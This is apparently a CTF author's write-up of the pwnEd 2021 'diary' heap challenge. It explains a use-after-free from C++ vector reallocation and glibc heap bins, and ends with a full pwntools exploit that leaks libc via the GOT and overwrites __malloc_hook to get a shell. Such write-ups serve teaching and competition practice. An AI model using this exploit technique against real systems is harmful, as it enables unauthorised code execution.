pwnEd 2021 - Diary Pwn Challenge

2021-03-12 ctf pwn

pwnEd 2021 was the second iteration of the University of Edinburgh cyber security competition hosted by SIGINT from CompSoc. I’m a member of SIGINT and was the author of the diary pwn challenge, which was the only challenge without any solves throughout the CTF.

This post will attempt to describe how to solve this challenge in detail for those with less experience in heap exploitation.

Note: This challenge was modified from UnionCTF 2021’s notepad challenge, which I also wrote.

Bug

The crucial bug in the code provided was the use-after-free of Diary::currentEntry_, which is located in diary.h. That is to say Diary::currentEntry_ would hold a pointer to memory that has been freed.

class Diary {
private:
    Entry* findEntryByName(const std::string& search)
    {
        auto result = std::find_if(entries_.begin(), entries_.end(), 
            [&](Entry& entry) {
                if (std::strstr(entry.getName().data(), search.data())) {
                    return true;
                }
                return false;
            }
        );

        if (result != entries_.end()) {
            return &*result;
        }
        return nullptr;
    }

    std::vector<Entry> entries_;
    Entry* currentEntry_;

public:
    Diary()
    {
        entries_.reserve(5);
    }

    void createEntry(const std::string& name, const std::string& content)
    {
        // Bug: reallocation occurs when vector reaches capacity
        entries_.emplace_back(name, content);
    }

    Entry& getEntry(size_t idx)
    {
        return entries_.at(idx);
    }

    void editEntryName(const std::string& name)
    {
        currentEntry_->setName(name);
    }

    void editEntryContent(const std::string& content)
    {
        currentEntry_->setContent(content);
    }

    bool selectEntryByName(const std::string& search)
    {
        auto entry = findEntryByName(search);
        if (entry != nullptr) {
            currentEntry_ = entry;
            return true;
        }
        return false;
    }

    void printCurrentEntry() const
    {
        currentEntry_->printContents();
    }
};

A vector in C++ would hold a pointer to a backing store, along with various metadata about capacity, size, etc. This backing store starts out with a certain capacity allocated from the heap.

Vector backing store when allocated

Since vectors can grow to an almost arbitrary size, the backing store needs to be resized whenever the capacity limit is reached. When entries are inserted into the vector Diary::entries_, the size of the vector grows until it hits this limit and triggers a reallocation.

Vector backing store when freed

A reallocation would allocate a new larger backing store, copy over the current backing store, and free the current backing store. Now the process is rather transparent and entries_ would be updated to point to the new backing store. However, Diary::currentEntry_ still holds a pointer to an entry in the old backing store.

What happens to the old backing store?

The point of freeing memory is so that it can be recycled by the memory allocator. A chunk of memory that has been freed in glibc would be placed in a free bin. Which bin it goes into depends on the chunk size, and state of the bins, among other things. To name a few, there are fast bins, small bins, large bins, and unsorted bins, the version the challenge uses (glibc 2.31) also has tcache. Let’s focus on unsorted bins and tcache.

Upon the next allocation, the allocator would look into a suitable free list, which depends on the size of memory requested, and hand out a pointer to the requesting function after removing the chunk from the free list. Tcache and fast bins are special because they would be recycled when the memory requested matched the size of the bin exactly.

But what happens when the backing store enters the unsorted bins? Then the allocator would serve pointers from the unsorted bin to requests of smaller chunks. This means that if we allocate a smaller object on the heap, a string for example, we will be able to overlap/overwrite the Entry object pointed to by currentEntry_.

Entry object is overwritten by new strin

Protections

Let’s quickly look at the general protections in place for this binary.

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
  • We have full RELRO, which prevents you from overwriting the global offset table.
  • Stack canaries are in place, but since the bug is heap base, it is rather irrelevant.
  • NX bit should be set unless you time travelled to 1999.
  • No PIE means that binary addressess don’t need to be leaked as the executable itself would not be subjected to ASLR, libraries not included.

Exploit path

Hopefully now there’s a clear idea of the cause and implications of the bug. Let’s see how we can exploit it.

Overlapping object primitive

First observe the Entry class.

class Entry {
private:
    std::string name_;
    std::string content_;

public:
    Entry(const std::string& name, const std::string& content) : name_(name), content_(content) {}
    
    virtual std::string& getName()
    {
        return name_;
    }

    virtual std::string& getContent()
    {
        return content_;
    }

    virtual void printContents() const
    {
        char buf[32];
        char const* entryStart = "     _______________________  \n"
                                "   =(__    ___      __     _)=\n";
        char const* entryEnd   = "   =(_______________________)=\n";
        char const* line      = "     | %-19s |\n";

        std::string output(entryStart);
        for (size_t i = 0; i < content_.length(); i += 19) {
            std::memset(buf, 0, sizeof(buf));
            auto part = content_.substr(i, 19);
            std::snprintf(buf, sizeof(buf), line, part.data());
            output += std::string(buf);
        }
        output += entryEnd;
        std::cout << output << std::endl;
    }

    void setName(const std::string& name)
    {
        name_ = name;
    }

    void setContent(const std::string& content)
    {
        content_ = content;
    }
};

If we can write data into the newly allocated object, we can overwrite pointers in the Entry object, for example std::string backing store. We see that there are two std::string fields in Entry, which are light abstractions of C strings where the backing store is also allocated on the heap (when large enough). Those fields would contain metadata including a pointer to the string’s backing store. That pointer would be where the program writes to when setting the string. This can potentially yield an arbitrary read/write primitive that could lead to code execution.

Entry object is overwritten by new strin

Bad drawing aside, an attacker can point the backing store to critical locations, say the global offset table. From where we overwrite an entry system and get a shell… right? Remember that we have full RELRO, so the GOT is read only, we need to overwrite another code redirection gadget like __free_hook instead.

But that is not to say it is useless to point to the GOT, we read the string instead for a libc leak. The leak is to bypass address space layout randomization (ASLR), and hand us an address we can calculate the position of system or one gadgets with. With system we can simply free a buffer containing /bin/sh to pop a shell.

Here’s the full exploit:

exe = context.binary = ELF('./diary')
libc = ELF('./libc-2.31.so')

host = args.HOST or 'localhost'
port = int(args.PORT or 1337)

'''
Exploit path
1. Trigger vector realloc for UAF
2. UAF string backing store overwrite for GOT libc leak
3. Trigger another vector realloc for UAF
4. Malloc hook overwrite with edit to one gadget
5. Shell
'''

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

def create_note(name, content):
    io.sendlineafter('>', '1')
    io.sendlineafter('Name:', name)
    io.sendlineafter('Content:', content)

def find_note(name):
    io.sendlineafter('>', '2')
    io.sendlineafter('Look for:', name)

def edit_current(name, content):
    io.sendlineafter('>', '3')
    io.sendlineafter('>', '2')
    io.sendlineafter('Name:', name)
    io.sendlineafter('Content:', content)
    io.sendlineafter('>', '3')

def print_current():
    io.sendlineafter('>', '3')
    io.sendlineafter('> ', '1')
    io.recvuntil('choice: 1\n')
    leak = io.recvuntil('1. View')[:-7]
    io.sendlineafter('>', '3')
    return leak

# PLT addresses + other constants
one_gadget = 0xe6c81
libc_strlen = 0x18b660

io = start(env={'LD_PRELOAD': libc.path})

# Read primitive via UAF
for i in range(20):
    create_note(f'GAMESTOP{i}', 'GAMESTOP')
find_note('GAMESTOP1')
create_note(cyclic(0x36), 'GAMESTOP')
create_note(flat({0x28: exe.sym._ZTV5Entry + 0x10}), flat({0x10: exe.got.strlen}))

# Leak libc
leak = print_current()
leak = leak[leak.find(b'_)=\n     | ') + len(b'_)=\n     | '):]
libc_leak = u64(leak[:6] + b'\x00' * 2)
libc.address = libc_leak - libc_strlen
log.info(f'Libc base: 0x{libc.address:x}')

# Write primitive via UAF
for i in range(18):
    create_note('GAMESTOP', 'GAMESTOP')
find_note('GAMESTOP1')
create_note(cyclic(0x2c1), 'GAMESTOP')
create_note(cyclic(0x36), flat({0x20: libc.sym.__malloc_hook}))
create_note(flat({0x20: libc.sym.__malloc_hook}), '/bin/sh')

# Edit overwrite
io.sendlineafter('>', '3')
io.sendlineafter('>', '2')
io.sendlineafter('Name:', p64(libc.address + one_gadget))
io.sendlineafter('Content:', 'GAMESTOP' * 6)

io.interactive()